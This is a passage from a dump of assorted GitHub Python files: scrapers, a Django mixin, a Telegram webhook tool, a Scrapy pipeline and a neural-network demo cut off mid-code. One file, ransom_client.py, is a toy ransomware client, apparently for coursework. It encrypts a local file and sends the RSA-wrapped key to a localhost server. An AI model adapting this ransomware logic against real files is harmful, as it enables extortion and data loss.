final_wds}\n\n return final_dict\n\n '''基于特征词进行分类'''\n def check_words(self, wds, sent):\n for wd in wds:\n if wd in sent:\n return True\n return False\n\n\nif __name__ == '__main__':\n handler = QuestionClassifier()\n while 1:\n question = input('input an question:')\n data = handler.classify(question)\n print(data)","repo_name":"cooperck/QA_ReuseWater_KG","sub_path":"ruw_question_classifier.py","file_name":"ruw_question_classifier.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1170301963","text":"import telegram\n\nprint(\"provide token\")\ntoken = input()\nprint(\"provide webhook url (or no to use existing)\")\nurl = input()\n\nbot = telegram.Bot(token=token)\n\nif url == \"no\":\n url = bot.get_webhook_info()['url']\n\n\nbot.set_webhook(url, allowed_updates=[\"new_chat_members\"]) and print(\"Successfully updated\")\n","repo_name":"MehmetErkcn/VenusWelcomeBot","sub_path":"external_utilities/set_webhook.py","file_name":"set_webhook.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22026374950","text":"from django.db.models import Count\n\nfrom .models import *\n\nmenu = [{'title': \"О нас\", 'url_name': 'about'},\n {'title': \"Обратная связь\", 'url_name': 'contact'},\n {'title': \"Добавить услугу\", 'url_name': 'add_page'},\n ]\n\n\nclass DataMixin:\n paginate_by = 10\n\n def get_user_context(self, **kwargs):\n context = kwargs\n cats = Category.objects.annotate(Count('service'))\n\n user_menu = menu.copy()\n if not self.request.user.is_superuser:\n user_menu.pop(2)\n\n context['menu'] = user_menu\n\n context['cats'] = cats # tag для html\n if 'cat_selected' not in context:\n context['cat_selected'] = 0\n return context\n","repo_name":"VDK45/AvtoAvtoStandart","sub_path":"avtosite/avto_tochka/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32539290422","text":"# Cryptography imports for encrypting the keys\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding, rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.fernet import Fernet\n\n# Socket import for using TCP/IP to connect to the server\nimport socket\n\n\"\"\"\nThis file is used to encrypt a file using a symmetric key. The symmetric key is encrypted using the public key of the recipient.\nThe encrypted key is then saved to a file. That key is then used to encrypt a file.\n\"\"\"\n\n# Using Fetnet to generate a token for the key\nsymmetricKey = Fernet.generate_key()\nFernetInstance = Fernet(symmetricKey)\n\n# Opening the public_key to load into memory\nwith open(\"./keys/public_key.key\", \"rb\") as key_file:\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n# Creating an encryptedSymmetricKey with the public_key for encryption\n# using SHA256\nencryptedSymmetricKey = public_key.encrypt(\n symmetricKey,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n)\n\n# Opening or creating the encrypted key file and writing the encryption to\n# it, reading the Fernet Instance and writing the data\nwith open(\"./keys/encryptedSymmertricKey.key\", \"wb\") as key_file:\n key_file.write(encryptedSymmetricKey)\n filePath = \"./ransomware/SecretTextFile.txt\"\n\n with open(filePath, \"rb\") as file:\n file_data = file.read()\n print(file_data)\n encrypted_data = FernetInstance.encrypt(file_data)\n\n with open(filePath, \"wb\") as file:\n file.write(encrypted_data)\n\n\ndef decryptFile(filePath, key):\n FernetInstance = Fernet(key)\n with open(filePath, \"rb\") as d_file:\n file_data = d_file.read()\n decrypted_data = FernetInstance.decrypt(file_data)\n\n with open(\"./ransomware/decryptedTextFile.txt\", \"wb\") as file:\n file.write(decrypted_data)\n\n\ndef sendEncryptedKey(eKeyFilePath):\n with socket.create_connection((\"127.0.0.1\", 8000)) as sock:\n with open(eKeyFilePath, \"rb\") as file:\n file_data = file.read()\n sock.send(file_data)\n decryptedSymmetricKey = sock.recv(1024).strip()\n decryptFile(\"./ransomware/SecretTextFile.txt\",\n decryptedSymmetricKey)\n\n\nsendEncryptedKey(\"./keys/encryptedSymmertricKey.key\")\nquit()\n","repo_name":"LemonSauc3/A1","sub_path":"ransom_client.py","file_name":"ransom_client.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25669662633","text":"import turtle as tr\r\ntr.shape('turtle')\r\nfrom random import *\r\ntr.speed(0)\r\n\r\ndef sluchaino():\r\n while True:\r\n tr.forward(randint(1, 30))\r\n a = random()\r\n if a >= 0.5:\r\n tr.right(randint(30, 360))\r\n else:\r\n tr.left(randint(30, 360))\r\n\r\n\r\nsluchaino()\r\ntr.exitonclick() ","repo_name":"petersNikolA/turtle2","sub_path":"turtle2,1.py","file_name":"turtle2,1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37909418182","text":"from bs4 import BeautifulSoup\nimport urllib.request as urllib2\nfor offset in range(0, 10, 10):\n redditFile = urllib2.urlopen(\n \"https://www.indeed.com/jobs?q=sql&l=United+States&sort=date&radius=25&start=\"+str(offset))\n redditHtml = redditFile.read()\n redditFile.close()\n\n soup = BeautifulSoup(redditHtml, 'html.parser')\n # print(soup)\n jobs = soup.find_all(\"div\", {\"class\": \"jobsearch-SerpJobCard\"})\n\n # print(jobs)\n\n #Title = soup.find_all(\"a\", {\"class\": \"jobtitle turnstileLink\",\"data-tn-element\": \"jobTitle\"})\n #Company = soup.find_all(\"a\", {\"data-tn-element\": \"companyName\"})\n for job in jobs:\n try:\n key = ['title', 'company', 'star', 'date']\n value = [job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"a\", {\"data-tn-element\": \"companyName\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip()]\n # Create a zip object from two lists\n dicobj = zip(key, value)\n # Create a dictionary from zip object\n dictOfWords = dict(dicobj)\n print(dictOfWords)\n except:\n try:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n except:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n","repo_name":"SudharsanaViswanathan/python","sub_path":"WebScrapingIndeedJobs/test_scripts/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22553262662","text":"import os, sys\nimport pandas as pd\nimport shutil\nfrom tqdm import tqdm\n\n# 파일에 원하는 정보를 데이터프레임으로 만들기\ndef make_df(dir):\n file_info = []\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.jpg':\n file_path = os.path.join(root, file)\n filename_split = filename.split('_')\n category = '_'.join(filename_split[:4])\n file_idx = int(filename_split[-1])\n file_info.append([file_path, category, file_idx])\n df = pd.DataFrame(file_info, columns=['filepath', 'category', 'num'])\n\n return df\n\n# 조건에 맞는 파일 추출\ndef file_extract(df, old_df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n old_df = old_df[old_df['category'] == Category]\n\n for i in range(minidx, maxidx, 3):\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n extract_num1 = extract_num + 10\n extract_num2 = extract_num + 20\n # copyfile(df, extract_num)\n old_file = old_df.loc[old_df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n copyfile(df, extract_num1)\n copyfile(df, extract_num2)\n\n\n# 파일 복사\ndef copyfile(df, num):\n extract_file = df.loc[df['num'] == num, 'filepath']\n extract_file = extract_file.values[0]\n root, file = os.path.split(extract_file)\n folder_name = '_'.join(file.split('_')[:3])\n folder = os.path.join(output_dir, 'new_db', folder_name)\n output_path = os.path.join(folder, file)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(extract_file, output_path)\n\n \ndef old_file_extract(df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n for i in range(minidx, maxidx, 3):\n old_file = df.loc[df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n old_file = old_file.values[0]\n root, file = os.path.split(old_file)\n folder_name = '_'.join(file.split('_')[:3])\n filename = '_'.join(file.split('_')[:4])\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n num = str(extract_num).zfill(8)\n frame_filename = f'{filename}_{num}.jpg'\n folder = os.path.join(output_dir, 'old_db', folder_name)\n output_path = os.path.join(folder, frame_filename)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(old_file, output_path)\n \n_, old_db_dir, new_db_dir, output_dir, mode_num = sys.argv\n\nold_db_df = make_df(old_db_dir)\nnew_db_df = make_df(new_db_dir)\n\ncategory_list = old_db_df['category'].unique()\n\n# 맨 앞 프레임을 무조건 살리는 경우\nif mode_num == '0':\n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n \n# 맨 앞 프레임에 조건을 넣을 경우\nelif mode_num == '1': \n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n min_idx = min_idx + 2\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n min_idx = min_idx + 1\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)","repo_name":"tkdalsrb123/Alchera","sub_path":"08/0801_frame_match_extract/frame_match_extract.py","file_name":"frame_match_extract.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11423635038","text":"import numpy as np\nimport pandas as pd\nimport yfinance as yf\nimport json as js\n\n# Function to pull option information of a stock\ndef option_pull(sym):\n ticker = yf.Ticker(sym)\n list_of_expirations = ticker.options\n\n # dataframe for options\n options = pd.DataFrame()\n\n for entry in list_of_expirations:\n curr_option = ticker.option_chain(entry)\n aggr_option = pd.DataFrame().append(curr_option.calls).append(curr_option.puts)\n aggr_option['expirationDate'] = entry\n options = options.append(aggr_option, ignore_index=True)\n\n return options\n\nprint (option_pull(\"AMD\"))\n\n\n\n\n\n","repo_name":"Anthony3301/Options-Evalutation-Tool","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12599076265","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # 商品购买\n url(r'^product/$', views.product, name=\"product\"),\n url(r'^add/$',views.add,name=\"add\"),\n url(r'^findTypeByPID/$',views.findTypeByPID,name=\"findTypeByPID\"),\n # 购买\n url(r'(?P\\d+)/product/$', views.product, name=\"product\"),\n # 评论\n url(r'(?P\\d+)/pinglun/$', views.pinglun, name=\"pinglun\"),\n # 详情\n url(r'(?P\\d+)/xiangqing/$', views.xiangqing, name=\"xiangqing\"),\n # 分类\n url(r'(?P\\d+)/fenlei/$', views.fenlei, name=\"fenlei\"),\n]","repo_name":"0912TAO/mall1","sub_path":"goods/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34641998815","text":"class Person:\n def __init__(self, name, money, mood, healthRate):\n self.name = name\n self.money = money\n self.mood = mood\n self.healthRate = healthRate\n\n def eat(self, meals):\n meals = int(meals)\n if meals == 3:\n return \"100% hth\"\n elif meals == 2:\n return \"75% hth\"\n elif meals == 1:\n return \"50% hth\"\n elif meals == 0:\n return \"0% hth\"\n elif meals > 3:\n return \"fat\"\n else:\n return \"wrong input\"\n\n def sleep(self, hours):\n hours = int(hours)\n if hours == 7:\n return \"Happy\"\n elif hours < 7:\n return \"tired\"\n else:\n return \"Lazy\"\n\n def buy(self, items):\n items = int(items)\n self.money += items * 10\n return self.money\n\n @property # print property value\n def healthRate(self):\n return self.__healthRate\n\n @healthRate.setter\n def healthRate(self, helth):\n if helth >= 0 and helth <= 100:\n self.__healthRate = helth\n else:\n print(\"must be between 0 to 100.\")\n","repo_name":"minaemad13/Python_ITI_Lab4","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15954356355","text":"#\"我的魔幻宠物\"\n#目的:通过编程创建和自己互动的虚拟宠物,学习类的一些基本概念和用法\n'''现在请发挥你的想象力,把自己想象成一位宠物店的小魔法师,\n 现在你的工作是创造一些讨客人喜欢的魔幻宠物\n 可以是 传说中美丽的独角兽,那一定会让没见过独角兽的客人大吃一惊\n 但在这之前,我们需要学习一些魔法咒语(代码)\n'''\n#1.定义类\n'''首先,包括独角兽在内的所有魔幻宠物都需要先有个模型\n ,然后才能在这个模型的基础上去发挥想象力补充这个模型的具体细节\n 所以这个模型的创建,即类的定义,是十分很重要的\n 在这个过程中,我们需要使用第一条咒语\"class\",然后加上这个类的名称'''\nclass MyMagicPet:\n #2.定义属性\n '''\n 在类的下面给出魔幻宠物的基本属性:可以思考一下你要创建的一大群的宠物\n 会有的共同的特点,都会有名字,年龄等等,这里的答案很多,可以按照你的喜好\n 把它补充得更完整\n '''\n name = \"\"#名字\n age = 0#年龄\n gender = \"\"#性别\n color = \"\"#颜色\n #3.定义方法\n '''\n 接下来我们可以用”函数咒语“来实现我们想要对宠物进行的操作\n 比如选择他们的属性(例如:给他们取名,决定他们的性别),\n 还可以给它们喂食,跟他们玩耍等等'''\n def __init__(self, name, age, gender, color):\n '''\n 这个函数咒语可帮助我们定义一些创造出来的小动物可以改变的属性\n 这个过程也称为初始化(要记得写self)\n '''\n self.name = name\n self.age = age\n self.gender = gender\n self.color = color\n self.physicalCondition = \"健康的\"\n self.mentalCondition = \"快乐的\"\n self.degree = 0\n self.container = 0\n def show_info(self):\n print(f\"{self.name}的年龄是{self.age}岁,性别是{self.gender},颜色是{self.color}\")\n print(f\"状态是{self.physicalCondition}和{self.mentalCondition},等级是{self.degree}\")\n def feed_pet(self):\n '''\n 这是一个喂宠物的函数咒语,\n 根据宠物的健康状态进行不同的操作,\n 喂食成功会改变宠物的状态并升级宠物,\n 喂食失败则输出失败信息\n '''\n if self.physicalCondition == \"健康的\":\n print(\"喂食成功,你的宠物打了一个很响的饱嗝\")\n self.physicalCondition = \"饱食的\"\n self.upgrade_pet()\n elif self.physicalCondition == \"饥饿的\":\n print(\"喂食成功,你的宠物蹭着你的腿表示感谢\")\n self.physicalCondition = \"健康的\"\n self.upgrade_pet()\n else:\n print(\"喂食失败\")\n print(f\"{self.name}现在状态是{self.physicalCondition}\")\n print(\"无法继续获取经验,需要玩耍\")\n if self.mentalCondition == \"疲劳的\":\n self.mentalCondition = \"快乐的\"\n print(f\"{self.name}现在状态是{self.physicalCondition}和{self.mentalCondition}\")\n def play_with_pet(self):\n '''\n 这个函数咒语根据宠物的身心状态决定是否可以和宠物玩耍,\n 并根据结果更新宠物的状态信息。\n\n '''\n if self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"快乐的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"兴奋的\"\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n self.upgrade_pet()\n elif self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"兴奋的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"疲劳的\"\n self.physicalCondition = \"饥饿的\"\n self.upgrade_pet()\n else:\n print(\"跟他们玩耍失败\")\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n print(\"无法继续获取经验,需要喂食\")\n print(f\"{self.name}现在的状态是{self.physicalCondition}和{self.mentalCondition}\")\n def roll_over(self):\n '''这是一个简单的让宠物执行翻滚动作的函数咒语'''\n if self.degree >= 2:\n print(\"宠物翻滚成功\")\n self.upgrade_pet()\n else:\n print(\"宠物翻滚失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到2级才能翻滚\")\n def upgrade_pet(self):\n '''这个函数咒语可就厉害了,它能实现我们在游戏中经常看到的角色升级功能\n 那它的操作思路是怎么样的呢\n 1,首先,得用到上面初始化的存储经验的容器self.container\n 在执行一次可以加经验的行为的时候,容器里的经验值加1,\n 2.然后我们给这个容器一个上限:5\n 然后用if咒语来判断容器在加经验后是否满了\n 要是满了,就升一级,同时把容器里的经验清零,\n 然后就能实现这个升级功能啦'''\n self.container = self.container + 1\n print(f\"宠物{self.name}经验值加一,离升下一级还差{5 - self.container}点经验值\")\n if self.container == 5:\n self.degree = self.degree + 1\n print(f\"恭喜你的宠物{self.name}成功升到{self.degree}级\")\n self.container = 0\n\n'''\n class咒语还有另一种作用,叫做\"继承\",就是传承基本的宠物类的各种属性及方法(也就是函数)\n 在继承的过程中,你也可以根据你所希望对宠物进行的操作来进行属性和方法的修改或增加'''\n\nclass Dragon(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n #子类继承上面的父类,当然可以继承父类的属性和方法,当我们在调用时,还需用到另一条咒语:super()\n #在子类的基础上,我们可以添加一些独特的属性和方法\n self.size = \"大型\"\n self.strength = \"强大\"\n self.speed = \"飞快\"\n self.tech = tech\n def magic_transform(self):\n #这是一个简单的用来换技能的函数咒语,它会根据宠物的等级来判断是否可以进行技能转换\n if self.tech == \"技能1\":\n if self.degree <= 4:\n print(\"技能转换失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到5级才能转换\")\n else:\n print(\"技能转换成功\")\n self.tech = \"技能2\"\n print(\"技能转换成功\")\n elif self.tech == \"技能2\":\n self.tech = \"技能1\"\n print(\"技能转换成功\")\n def use_tech(self):\n #当然,既然我们创建的是魔幻宠物,那就得有些其他的的普通宠物没有的特点,\n # 比如,它可以用技能,这是一个用来使用技能的函数咒语,在里边判断宠物所持有的技能\n # 然后根据技能的效果来进行相应的操作\n if self.tech == \"技能1\":\n print(\"技能1使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前喷射了一小团小小的火焰,\")\n else:\n print(f\"你的宠物{self.name}向前喷射了一团巨大的火焰\")\n self.physicalCondition = \"饥饿的\"\n self.mentalCondition = \"疲劳的\"\n self.upgrade_pet()\n elif self.tech == \"技能2\":\n print(\"技能2使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前刮起了一阵人畜无害的微风\")\n self.upgrade_pet()\n else:\n print(f\"你的宠物{self.name}将会向前刮起一阵毁灭性的龙卷风\")\n choice = input(\"你要继续使用技能吗?(y/n)\")\n if choice == \"y\":\n print(f\"你的宠物{self.name}向前刮起了一阵毁灭性的龙卷风\")\n print(\"很好,在一流魔法师店长的及时的救助下,魔法宠物店有幸没有化为废墟\")\n print(\"所谓大难不死必有后福,在使用了这一强力技能后,你的宠物获得了大量经验\")\n for i in range(10):\n self.upgrade_pet()\n print(f\"现在你的宠物{self.name}的等级是{self.degree}\")\n elif choice == \"n\":\n print(\"你选择了不使用技能\")\n else:\n print(\"你输入了错误的选项,请在“n,y”中选一\")\n\n def show_func(self):\n print(\"我是一个大型的火焰龙,我有着强大的力量,我飞快地移动\")\n print(f\"现在我能使用的技能是{self.tech}\")\nclass Unicorn(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n self.size = \"中型\"\n self.strength = \"壮实\"\n self.speed = \"飞速\"\n self.tech = tech\n def show_func(self):\n print(\"我是一个中型的独角兽,我有着强大的力量,我飞速地移动\")\n\n#在完成上述的类的定义和继承后,我们就做足施展魔法的准备了,下面请尽情施展魔法吧!\n#比如创建一个Dragon类的对象怎么样?\n\n#比如对它进行操作怎么样?\n\n#比如对它进行升级怎么样?\n\n#再比如,做些更厉害的事,去发挥想象力去补充下独角兽类?\n\n#勇敢地去试试吧!\n\n","repo_name":"hzt200306/pythonProjectsDevelopment","sub_path":"python/06_lzt_MyMagicPet/魔法宠物程序制作.py","file_name":"魔法宠物程序制作.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10603534739","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass MzituPipeline(ImagesPipeline):\n def file_path(self, request, response=None, info=None):\n item = request.meta['item']\n folder = item['name']\n folder_strip = strip(folder)\n image_guid = request.url.split('/')[-1]\n filename = u'{0}/{1}'.format(folder_strip, image_guid) # 路径 只是生成路径\n return filename\n\n\n # 固定写法 多加一个referer 保存图片\n def get_media_requests(self, item, info):\n for img_url in item['image_urls']:\n referer = item['url']\n yield scrapy.Request(img_url, meta={'item': item,\n 'referer': referer})\n\n def item_completed(self, results, item, info):\n image_paths = [x['path'] for ok, x in results if ok]\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n return item\n\n\ndef strip(path):\n path = re.sub(r'[?\\\\*|“<>:/]', '', str(path))\n return path\n\n\nif __name__ == \"__main__\":\n a = '我是一个?\\*|“<>:/错误的字符串'\n print(strip(a))","repo_name":"pol9111/mzitu","sub_path":"mzitu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18689610220","text":"import os, sys\nimport zipfile\n\ndef statlog(s):\n print(\" -- %s\" % s)\n \nclass JAJFile:\n def __init__(self, jaj_filepath):\n if not zipfile.is_zipfile(jaj_filepath):\n raise Exception(\"I need a zipfile\")\n \n self.filepath = jaj_filepath\n self.filename = os.path.split(jaj_filepath)[0]\n self.zf = zipfile.ZipFile(jaj_filepath, 'r')\n\n self.background_pdf_filename = None\n self.background_pdf_filepath = None\n self.dc_svg_annotation = {}\n self.ls_extract = []\n self.dir_tmp = None\n\n for info in self.zf.infolist():\n if info.filename.startswith(\"background\") and info.filename.endswith(\".pdf\"):\n self.background_pdf_filename = info.filename\n self.ls_extract.append(info.filename)\n # jarnal annotations have format \"p%d.svg\" and start from 0\n if info.filename.startswith('p') and info.filename.endswith('.svg'):\n svg_page_num = int(os.path.splitext(info.filename[1:])[0])\n # cache the svgs in the annotation directory\n self.dc_svg_annotation[svg_page_num] = info.filename\n self.ls_extract.append(info.filename)\n \n if self.background_pdf_filename is None:\n raise Exception(\"did not did not find any pdfs in the jaj\")\n \n def extract_to_directory(self, output_directory):\n if not os.path.exists(output_directory):\n os.mkdir(output_directory)\n self.dir_tmp = output_directory\n for filename in self.ls_extract:\n extract_path = os.path.join(output_directory, filename)\n open(extract_path, 'wb').write(self.zf.read(filename))\n #statlog('extracted %s' % filename)\n\n self.background_pdf_filepath = os.path.join(output_directory, self.background_pdf_filename)\n \n def cleanup(self):\n if not self.dir_tmp: return\n for filename in self.ls_extract:\n print(\"~ jaj %s\" % filename)\n os.unlink(os.path.join(self.dir_tmp, filename))\n os.rmdir(self.dir_tmp)\n \n # old stuff from another class that did something similar, possibly\n # redundant. shoehorned to fit here, may not work\n def deflate(self):\n if not self.dir_tmp:\n self.dir_tmp = \"%s.dir\" % self.filename\n CWD = os.getcwd()\n os.mkdir(self.dir_tmp)\n os.chdir(self.dir_tmp)\n \n # extract into dir_tmp\n for info in self.zf.infolist():\n with open(info.filename, \"w\") as ofile:\n ofile.write(self.zf.read(info.filename))\n\n os.chdir(CWD)\n \n def inflate(self, remove_temp = True):\n if not self.dir_tmp:\n self.deflate()\n\n CWD = os.getcwd()\n os.chdir(self.dir_tmp)\n\n ls_archive_file = os.listdir('.')\n print(\"creating archive...\")\n zofile = zipfile.ZipFile(self.filename, mode='w')\n try:\n for filename in ls_archive_file:\n zofile.write(filename)\n finally:\n print(\"archive successfully created\")\n zofile.close()\n\n os.chdir(CWD)\n \n if remove_temp:\n os.rename(os.path.join(self.dir_tmp, self.filename), os.path.join(CWD, self.filename))\n shutil.rmtree(self.dir_tmp)\n self.dir_tmp = None\n \n\n","repo_name":"whacked/BeanBunny","sub_path":"BeanBunny/io/JarnalFile.py","file_name":"JarnalFile.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70732230567","text":"# simple neuron using complex numbers for weights and input\n# to learn the XOR problem, must use 2 periods, ie, dividing the circle into 2 sections so opposite angles have the same category\n# The ideas are based from the link below, which I modified based on my understanding of how the neuron behaves\n# I've extended this to include visualization of the neural activity\n# https://github.com/makeyourownneuralnetwork/complex_valued_neuralnetwork/blob/master/single_neuron-periodic.ipynb\n# http://makeyourownneuralnetwork.blogspot.com/2016/05/complex-valued-neural-networks.html\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport math\nimport copy\n\n# initialize visualization\nfig, ax = plt.subplots(figsize=(8, 5), subplot_kw=dict(aspect=\"equal\", adjustable='datalim', anchor='C'))\n# ax.set_xlim((-4,4))\n# ax.set_ylim((-4,4))\nfig.set_dpi(100)\nclass ComplexNeuron():\n def __init__(self, inputn, cat, periods):\n self.input_num = inputn\n self.categories = cat\n self.periods = periods\n self.tc_passed = 0\n\n # link weights matrix\n self.w = np.random.normal(0.0, 1.0, (inputn + 1))\n self.w = np.array(self.w, ndmin=2, dtype='complex128')\n self.w += 1j * np.random.normal(0.0, 1.0, (inputn + 1))\n print ('Weights: ', self.w)\n self.out = {}\n self.map_out()\n print ('Out Mapping: ',self.out)\n\n def map_out(self):\n sections = self.categories * self.periods\n angle = 2 * np.pi / sections\n h_angle = angle / 2\n # angle + π to get the oposite angle\n for i in range(1, self.categories+1):\n out_dict = {}\n o_angle = angle * i\n t_angle = o_angle - h_angle\n\n out_dict['angle'] = [o_angle]\n out_dict['target'] = [t_angle]\n if self.periods == 2:\n for j in range(1, self.periods):\n out_dict['angle'].append(o_angle + np.pi)\n out_dict['target'].append(t_angle + np.pi)\n\n self.out[i-1] = out_dict\n self.out[i-1] = out_dict\n\n # create Pie to represent neuron\n data = np.ones(4)\n labels = ['False', 'True'] * 2\n patches, texts, autotexts = ax.pie(data, autopct=lambda pct: int(pct * sum(data)/100), \n labels=labels, textprops=dict(color=\"w\"))\n \n # set Pie legends Title and loc\n ax.legend(patches, labels,\n title=\"Truth Values\",\n loc=\"center left\",\n bbox_to_anchor=(0.8, 0, 0.5, 1))\n\n # Set Legends color and Texts\n legnds = ax.get_legend()\n for i in range(sections):\n patches[i-1].set_alpha(0.7)\n if i%2 == 0:\n autotexts[i].set_text('0')\n patches[i].set_color('#0cff0c')\n legnds.legendHandles[i].set_color('#0cff0c')\n else:\n patches[i].set_color('#0165fc')\n legnds.legendHandles[i].set_color('#0165fc')\n\n ax.set_title(\"Single Neuron:\\nSolving XOR Problem\")\n plt.setp(autotexts, size=8, weight=\"bold\")\n \n def map_z(self, z):\n z = np.angle(z)\n while z < 0:\n z += 2 * np.pi\n\n print ('Angle: ', z)\n for i in range(self.periods):\n for j in range(self.categories):\n if z < self.out[j]['angle'][i]:\n return j, i\n\n def query(self, in_list, visual=False):\n print ('++++++++++++++++ Q U E R Y ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n return z, (o, q)\n \n def train(self, in_list, target, visual=False):\n print ('++++++++++++++++ T R A I N ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print 